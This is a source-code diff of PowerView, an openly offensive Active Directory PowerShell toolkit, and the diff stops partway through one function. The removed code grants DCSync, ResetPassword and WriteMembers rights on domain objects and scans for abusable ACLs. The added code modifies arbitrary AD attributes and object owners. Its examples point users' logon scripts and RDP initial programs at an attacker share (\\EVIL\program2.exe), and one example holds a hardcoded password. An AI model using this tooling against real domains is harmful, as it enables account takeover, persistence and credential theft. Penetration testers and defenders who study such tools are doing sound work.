+VERBOSE: [Get-DomainUser] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins'
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(samAccountName=Domain Admins)))
+CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
 
-        [String]
-        $PrincipalName,
+.OUTPUTS
+
+PowerView.ADObject
+
+Custom PSObject with translated AD object property fields.
+
+PowerView.ADObject.Raw
 
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
+#>
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+    [OutputType('PowerView.ADObject')]
+    [OutputType('PowerView.ADObject.Raw')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
+        [String[]]
+        $Identity,
+
+        [ValidateNotNullOrEmpty()]
         [String]
-        $PrincipalSamAccountName,
+        $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
         [String]
-        [ValidateSet("All","ResetPassword","WriteMembers","DCSync")]
-        $Rights = "All",
+        $LDAPFilter,
+
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $Properties,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
         [String]
-        $RightsGUID,
+        $SearchBase,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $Domain,
+        $Server,
 
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
         [String]
-        $DomainController,
+        $SearchScope = 'Subtree',
 
-        [ValidateRange(1,10000)] 
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200
-    )
-
-    begin {
-        $Searcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -ADSpath $TargetADSpath -ADSprefix $TargetADSprefix -PageSize $PageSize
+        $ResultPageSize = 200,
 
-        if($PrincipalSID) {
-            $ResolvedPrincipalSID = $PrincipalSID
-        }
-        else {
-            $Principal = Get-ADObject -Domain $Domain -DomainController $DomainController -Name $PrincipalName -SamAccountName $PrincipalSamAccountName -PageSize $PageSize
-            
-            if(!$Principal) {
-                throw "Error resolving principal"
-            }
-            $ResolvedPrincipalSID = $Principal.objectsid
-        }
-        if(!$ResolvedPrincipalSID) {
-            throw "Error resolving principal"
-        }
-    }
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
 
-    process {
+        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+        [String]
+        $SecurityMasks,
 
-        if ($Searcher) {
+        [Switch]
+        $Tombstone,
 
-            if($TargetSamAccountName) {
-                $Searcher.filter="(&(samaccountname=$TargetSamAccountName)(name=$TargetName)(distinguishedname=$TargetDistinguishedName)$TargetFilter)"  
-            }
-            else {
-                $Searcher.filter="(&(name=$TargetName)(distinguishedname=$TargetDistinguishedName)$TargetFilter)"  
-            }
-  
-            try {
-                $Results = $Searcher.FindAll()
-                $Results | Where-Object {$_} | ForEach-Object {
+        [Alias('ReturnOne')]
+        [Switch]
+        $FindOne,
 
-                    # adapted from https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
 
-                    $TargetDN = $_.Properties.distinguishedname
+        [Switch]
+        $Raw
+    )
 
-                    $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$ResolvedPrincipalSID)
-                    $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None"
-                    $ControlType = [System.Security.AccessControl.AccessControlType] "Allow"
-                    $ACEs = @()
+    BEGIN {
+        $SearcherArguments = @{}
+        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+        $ObjectSearcher = Get-DomainSearcher @SearcherArguments
+    }
 
-                    if($RightsGUID) {
-                        $GUIDs = @($RightsGUID)
-                    }
-                    else {
-                        $GUIDs = Switch ($Rights) {
-                            # ResetPassword doesn't need to know the user's current password
-                            "ResetPassword" { "00299570-246d-11d0-a768-00aa006e0529" }
-                            # allows for the modification of group membership
-                            "WriteMembers" { "bf9679c0-0de6-11d0-a285-00aa003049e2" }
-                            # 'DS-Replication-Get-Changes' = 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
-                            # 'DS-Replication-Get-Changes-All' = 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
-                            # 'DS-Replication-Get-Changes-In-Filtered-Set' = 89e95b76-444d-4c62-991a-0facbeda640c
-                            #   when applied to a domain's ACL, allows for the use of DCSync
-                            "DCSync" { "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2", "89e95b76-444d-4c62-991a-0facbeda640c"}
-                        }
+    PROCESS {
+        if ($ObjectSearcher) {
+            $IdentityFilter = ''
+            $Filter = ''
+            $Identity | Where-Object {$_} | ForEach-Object {
+                $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+                if ($IdentityInstance -match '^S-1-') {
+                    $IdentityFilter += "(objectsid=$IdentityInstance)"
+                }
+                elseif ($IdentityInstance -match '^(CN|OU|DC)=') {
+                    $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+                }
+                elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
+                    $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join ''
+                    $IdentityFilter += "(objectguid=$GuidByteString)"
+                }
+                elseif ($IdentityInstance.Contains('\')) {
+                    $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical
+                    if ($ConvertedIdentityInstance) {
+                        $ObjectDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/'))
+                        $ObjectName = $IdentityInstance.Split('\')[1]
+                        $IdentityFilter += "(samAccountName=$ObjectName)"
+                        $SearcherArguments['Domain'] = $ObjectDomain
+                        Write-Verbose "[Get-DomainObject] Extracted domain '$ObjectDomain' from '$IdentityInstance'"
+                        $ObjectSearcher = Get-DomainSearcher @SearcherArguments
                     }
+                }
+                elseif ($IdentityInstance.Contains('.')) {
+                    $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(dnshostname=$IdentityInstance))"
+                }
+                else {
+                    $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(displayname=$IdentityInstance))"
+                }
+            }
+            if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+                $Filter += "(|$IdentityFilter)"
+            }
 
-                    if($GUIDs) {
-                        foreach($GUID in $GUIDs) {
-                            $NewGUID = New-Object Guid $GUID
-                            $ADRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight"
-                            $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity,$ADRights,$ControlType,$NewGUID,$InheritanceType
-                        }
-                    }
-                    else {
-                        # deault to GenericAll rights
-                        $ADRights = [System.DirectoryServices.ActiveDirectoryRights] "GenericAll"
-                        $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity,$ADRights,$ControlType,$InheritanceType
-                    }
+            if ($PSBoundParameters['LDAPFilter']) {
+                Write-Verbose "[Get-DomainObject] Using additional LDAP filter: $LDAPFilter"
+                $Filter += "$LDAPFilter"
+            }
 
-                    Write-Verbose "Granting principal $ResolvedPrincipalSID '$Rights' on $($_.Properties.distinguishedname)"
+            if ($Filter -and $Filter -ne '') {
+                $ObjectSearcher.filter = "(&$Filter)"
+            }
+            Write-Verbose "[Get-DomainObject] Get-DomainObject filter string: $($ObjectSearcher.filter)"
 
-                    try {
-                        # add all the new ACEs to the specified object
-                        ForEach ($ACE in $ACEs) {
-                            Write-Verbose "Granting principal $ResolvedPrincipalSID '$($ACE.ObjectType)' rights on $($_.Properties.distinguishedname)"
-                            $Object = [adsi]($_.path)
-                            $Object.PsBase.ObjectSecurity.AddAccessRule($ACE)
-                            $Object.PsBase.commitchanges()
-                        }
-                    }
-                    catch {
-                        Write-Warning "Error granting principal $ResolvedPrincipalSID '$Rights' on $TargetDN : $_"
-                    }
+            if ($PSBoundParameters['FindOne']) { $Results = $ObjectSearcher.FindOne() }
+            else { $Results = $ObjectSearcher.FindAll() }
+            $Results | Where-Object {$_} | ForEach-Object {
+                if ($PSBoundParameters['Raw']) {
+                    # return raw result objects
+                    $Object = $_
+                    $Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject.Raw')
+                }
+                else {
+                    $Object = Convert-LDAPProperty -Properties $_.Properties
+                    $Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject')
                 }
-                $Results.dispose()
-                $Searcher.dispose()
+                $Object
             }
-            catch {
-                Write-Warning "Error: $_"
+            if ($Results) {
+                try { $Results.dispose() }
+                catch {
+                    Write-Verbose "[Get-DomainObject] Error disposing of the Results object: $_"
+                }
             }
+            $ObjectSearcher.dispose()
         }
     }
 }
 
 
-function Invoke-ACLScanner {
+function Set-DomainObject {
 <#
-    .SYNOPSIS
-        Searches for ACLs for specifable AD objects (default to all domain objects)
-        with a domain sid of > -1000, and have modifiable rights.
+.SYNOPSIS
+
+Modifies a gven property for a specified active directory object.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainObject  
+
+.DESCRIPTION
+
+Splats user/object targeting parameters to Get-DomainObject, returning the raw
+searchresult object. Retrieves the raw directoryentry for the object, and sets
+any values from -Set @{}, XORs any values from -XOR @{}, and clears any values
+from -Clear @().
+
+.PARAMETER Identity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+
+.PARAMETER Set
+
+Specifies values for one or more object properties (in the form of a hashtable) that will replace the current values.
 
-        Thanks Sean Metcalf (@pyrotek3) for the idea and guidance.
+.PARAMETER XOR
 
-    .PARAMETER SamAccountName
+Specifies values for one or more object properties (in the form of a hashtable) that will XOR the current values.
 
-        Object name to filter for.        
+.PARAMETER Clear
 
-    .PARAMETER Name
+Specifies an array of object properties that will be cleared in the directory.
 
-        Object name to filter for.
+.PARAMETER Domain
 
-    .PARAMETER DistinguishedName
+Specifies the domain to use for the query, defaults to the current domain.
 
-        Object distinguished name to filter for.
+.PARAMETER LDAPFilter
 
-    .PARAMETER Filter
+Specifies an LDAP query string that is used to filter Active Directory objects.
 
-        A customized ldap filter string to use, e.g. "(description=*admin*)"
-     
-    .PARAMETER ADSpath
+.PARAMETER SearchBase
 
-        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
 
-    .PARAMETER ADSprefix
+.PARAMETER Server
 
-        Prefix to set for the searcher (like "CN=Sites,CN=Configuration")
+Specifies an Active Directory server (domain controller) to bind to.
 
-    .PARAMETER Domain
+.PARAMETER SearchScope
 
-        The domain to use for the query, defaults to the current domain.
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
-    .PARAMETER DomainController
+.PARAMETER ResultPageSize
 
-        Domain controller to reflect LDAP queries through.
+Specifies the PageSize to set for the LDAP searcher object.
 
-    .PARAMETER ResolveGUIDs
+.PARAMETER ServerTimeLimit
 
-        Switch. Resolve GUIDs to their display names.
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-    .PARAMETER PageSize
+.PARAMETER Tombstone
 
-        The PageSize to set for the LDAP searcher object.
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-    .EXAMPLE
+.PARAMETER Credential
 
-        PS C:\> Invoke-ACLScanner -ResolveGUIDs | Export-CSV -NoTypeInformation acls.csv
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-        Enumerate all modifable ACLs in the current domain, resolving GUIDs to display 
-        names, and export everything to a .csv
+.EXAMPLE
+
+Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
+
+VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))
+VERBOSE: Setting mstsinitialprogram to \\EVIL\program.exe for object testuser
+
+.EXAMPLE
+
+"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Set @{'countrycode'=1234; 'mstsinitialprogram'='\\EVIL\program2.exe'} -Verbose
+
+VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: Get-DomainObject filter string:
+(&(|(objectsid=S-1-5-21-890171859-3433809279-3366196753-1108)))
+VERBOSE: Setting mstsinitialprogram to \\EVIL\program2.exe for object harmj0y
+VERBOSE: Setting countrycode to 1234 for object harmj0y
+VERBOSE: Get-DomainSearcher search string:
+LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))
+VERBOSE: Setting mstsinitialprogram to \\EVIL\program2.exe for object testuser
+VERBOSE: Setting countrycode to 1234 for object testuser
+
+.EXAMPLE
+
+"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Clear department -Verbose
+
+Cleares the 'department' field for both object identities.
+
+.EXAMPLE
+
+Get-DomainUser testuser | ConvertFrom-UACValue -Verbose
+
+Name                           Value
+----                           -----
+NORMAL_ACCOUNT                 512
+
+
+Set-DomainObject -Identity testuser -XOR @{useraccountcontrol=65536} -Verbose
+
+VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))
+VERBOSE: XORing 'useraccountcontrol' with '65536' for object 'testuser'
+
+Get-DomainUser testuser | ConvertFrom-UACValue -Verbose
+
+Name                           Value
+----                           -----
+NORMAL_ACCOUNT                 512
+DONT_EXPIRE_PASSWORD           65536
+
+.EXAMPLE
+
+Get-DomainUser -Identity testuser -Properties scriptpath
+
+scriptpath
+----------
+\\primary\sysvol\blah.ps1
+
+$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Set-DomainObject -Identity testuser -Set @{'scriptpath'='\\EVIL\program2.exe'} -Credential $Cred -Verbose
+VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
+VERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser))))
+VERBOSE: [Set-DomainObject] Setting 'scriptpath' to '\\EVIL\program2.exe' for object 'testuser'
+
+Get-DomainUser -Identity testuser -Properties scriptpath
+
+scriptpath
+----------
+\\EVIL\program2.exe
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
     [CmdletBinding()]
-    Param (
-        [Parameter(ValueFromPipeline=$True)]
-        [String]
-        $SamAccountName,
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('DistinguishedName', 'SamAccountName', 'Name')]
+        [String[]]
+        $Identity,
 
-        [String]
-        $Name = "*",
+        [ValidateNotNullOrEmpty()]
+        [Alias('Reaplce')]
+        [Hashtable]
+        $Set,
 
-        [Alias('DN')]
-        [String]
-        $DistinguishedName = "*",
+        [ValidateNotNullOrEmpty()]
+        [Hashtable]
+        $XOR,
 
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $Clear,
+
+        [ValidateNotNullOrEmpty()]
         [String]
-        $Filter,
+        $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
         [String]
-        $ADSpath,
+        $LDAPFilter,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
         [String]
-        $ADSprefix,
+        $SearchBase,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $Domain,
+        $Server,
 
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
         [String]
-        $DomainController,
+        $SearchScope = 'Subtree',
 
-        [Switch]
-        $ResolveGUIDs,
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
 
-        [ValidateRange(1,10000)] 
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200
+        $ServerTimeLimit,
+
+        [Switch]
+        $Tombstone,
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    # Get all domain ACLs with the appropriate parameters
-    Get-ObjectACL @PSBoundParameters | ForEach-Object {
-        # add in the translated SID for the object identity
-        $_ | Add-Member Noteproperty 'IdentitySID' ($_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value)
-        $_
-    } | Where-Object {
-        # check for any ACLs with SIDs > -1000
-        try {
-            # TODO: change this to a regex for speedup?
-            [int]($_.IdentitySid.split("-")[-1]) -ge 1000
+    BEGIN {
+        $SearcherArguments = @{'Raw' = $True}
+        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
+        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+    }
+
+    PROCESS {
+        if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity }
+
+        # splat the appropriate arguments to Get-DomainObject
+        $RawObject = Get-DomainObject @SearcherArguments
+
+        ForEach ($Object in $RawObject) {
+
+            $Entry = $RawObject.GetDirectoryEntry()
+
+            if($PSBoundParameters['Set']) {
+                try {
+                    $PSBoundParameters['Set'].GetEnumerator() | ForEach-Object {
+                        Write-Verbose "[Set-DomainObject] Setting '$($_.Name)' to '$($_.Value)' for object '$($RawObject.Properties.samaccountname)'"
+                        $Entry.put($_.Name, $_.Value)
+                    }
+                    $Entry.commitchanges()
+                }
+                catch {
+                    Write-Warning "[Set-DomainObject] Error setting/replacing properties for object '$($RawObject.Properties.samaccountname)' : $_"
+                }
+            }
+            if($PSBoundParameters['XOR']) {
+                try {
+                    $PSBoundParameters['XOR'].GetEnumerator() | ForEach-Object {
+                        $PropertyName = $_.Name
+                        $PropertyXorValue = $_.Value
+                        Write-Verbose "[Set-DomainObject] XORing '$PropertyName' with '$PropertyXorValue' for object '$($RawObject.Properties.samaccountname)'"
+                        $TypeName = $Entry.$PropertyName[0].GetType().name
+
+                        # UAC value references- https://support.microsoft.com/en-us/kb/305144
+                        $PropertyValue = $($Entry.$PropertyName) -bxor $PropertyXorValue
+                        $Entry.$PropertyName = $PropertyValue -as $TypeName
+                    }
+                    $Entry.commitchanges()
+                }
+                catch {
+                    Write-Warning "[Set-DomainObject] Error XOR'ing properties for object '$($RawObject.Properties.samaccountname)' : $_"
+                }
+            }
+            if($PSBoundParameters['Clear']) {
+                try {
+                    $PSBoundParameters['Clear'] | ForEach-Object {
+                        $PropertyName = $_
+                        Write-Verbose "[Set-DomainObject] Clearing '$PropertyName' for object '$($RawObject.Properties.samaccountname)'"
+                        $Entry.$PropertyName.clear()
+                    }
+                    $Entry.commitchanges()
+                }
+                catch {
+                    Write-Warning "[Set-DomainObject] Error clearing properties for object '$($RawObject.Properties.samaccountname)' : $_"
+                }
+            }
         }
-        catch {}
-    } | Where-Object {
-        # filter for modifiable rights
-        ($_.ActiveDirectoryRights -eq "GenericAll") -or ($_.ActiveDirectoryRights -match "Write") -or ($_.ActiveDirectoryRights -match "Create") -or ($_.ActiveDirectoryRights -match "Delete") -or (($_.ActiveDirectoryRights -match "ExtendedRight") -and ($_.AccessControlType -eq "Allow"))
     }
 }
 
 
-filter Get-GUIDMap {
+function Set-DomainObjectOwner {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Modifies the owner for a specified active directory object.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainObject  
+
+.DESCRIPTION
+
+Retrieves the Active Directory object specified by -Identity by splatting to
+Get-DomainObject, returning the raw searchresult object. Retrieves the raw
+directoryentry for the object, and sets the object owner to -OwnerIdentity.
+
+.PARAMETER Identity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+of the AD object to set the owner for.
+
+.PARAMETER OwnerIdentity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+of the owner to set for -Identity.
+
+.PARAMETER Domain
 
-        Helper to build a hash table of [GUID] -> resolved names
+Specifies the domain to use for the query, defaults to the current domain.
 
-        Heavily adapted from http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx
+.PARAMETER LDAPFilter
 
-    .PARAMETER Domain
-    
-        The domain to use for the query, defaults to the current domain.
+Specifies an LDAP query string that is used to filter Active Directory objects.
 
-    .PARAMETER DomainController
-    
-        Domain controller to reflect LDAP queries through.
+.PARAMETER SearchBase
 
-    .PARAMETER PageSize
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
 
-        The PageSize to set for the LDAP searcher object.
+.PARAMETER Server
 
-    .LINK
+Specifies an Active Directory server (domain controller) to bind to.
 
-        http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y
+
+Set the owner of 'dfm' in the current domain to 'harmj0y'.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y -Credential $Cred
+
+Set the owner of 'dfm' in the current domain to 'harmj0y' using the alternate credentials.
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
     [CmdletBinding()]
-    Param (
-        [Parameter(ValueFromPipeline=$True)]
+    Param(
+        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('DistinguishedName', 'SamAccountName', 'Name')]
+        [String]
+        $Identity,
+
+        [Parameter(Mandatory = $True)]
+        [ValidateNotNullOrEmpty()]
+        [Alias('Owner')]
+        [String]
+        $OwnerIdentity,
+
+        [ValidateNotNullOrEmpty()]
         [String]
         $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
         [String]
-        $DomainController,
+        $LDAPFilter,
 
-        [ValidateRange(1,10000)] 
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
+        [String]
+        $SearchBase,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
+
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
+
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200
-    )
+        $ResultPageSize = 200,
 
-    $GUIDs = @{'00000000-0000-0000-0000-000000000000' = 'All'}
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
 
-    $SchemaPath = (Get-NetForest).schema.name
+        [Switch]
+        $Tombstone,
 
-    $SchemaSearcher = Get-DomainSearcher -ADSpath $SchemaPath -DomainController $DomainController -PageSize $PageSize
-    if($SchemaSearcher) {
-        $SchemaSearcher.filter = "(schemaIDGUID=*)"
-        try {
-            $Results = $SchemaSearcher.FindAll()
-            $Results | Where-Object {$_} | ForEach-Object {
-                # convert the GUID
-                $GUIDs[(New-Object Guid (,$_.properties.schemaidguid[0])).Guid] = $_.properties.name[0]
-            }
-            $Results.dispose()
-            $SchemaSearcher.dispose()
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
+
+    BEGIN {
+        $SearcherArguments = @{}
+        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
+        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+
+        $OwnerSid = Get-DomainObject @SearcherArguments -Identity $OwnerIdentity -Properties objectsid | Select-Object -ExpandProperty objectsid
+        if ($OwnerSid) {
+            $OwnerIdentityReference = [System.Security.Principal.SecurityIdentifier]$OwnerSid
         }
-        catch {
-            Write-Verbose "Error in building GUID map: $_"
+        else {
+            Write-Warning "[Set-DomainObjectOwner] Error parsing owner identity '$OwnerIdentity'"
         }
     }
 
-    $RightsSearcher = Get-DomainSearcher -ADSpath $SchemaPath.replace("Schema","Extended-Rights") -DomainController $DomainController -PageSize $PageSize -Credential $Credential
-    if ($RightsSearcher) {
-        $RightsSearcher.filter = "(objectClass=controlAccessRight)"
-        try {
-            $Results = $RightsSearcher.FindAll()
-            $Results | Where-Object {$_} | ForEach-Object {
-                # convert the GUID
-                $GUIDs[$_.properties.rightsguid[0].toString()] = $_.properties.name[0]
+    PROCESS {
+        if ($OwnerIdentityReference) {
+            $SearcherArguments['Raw'] = $True
+            $SearcherArguments['Identity'] = $Identity
+
+            # splat the appropriate arguments to Get-DomainObject
+            $RawObject = Get-DomainObject @SearcherArguments
+
+            ForEach ($Object in $RawObject) {
+                try {
+                    Write-Verbose "[Set-DomainObjectOwner] Attempting to set the owner for '$Identity' to '$OwnerIdentity'"
+                    $Entry = $RawObject.GetDirectoryEntry()
+                    $Entry.PsBase.Options.SecurityMasks = 'Owner'
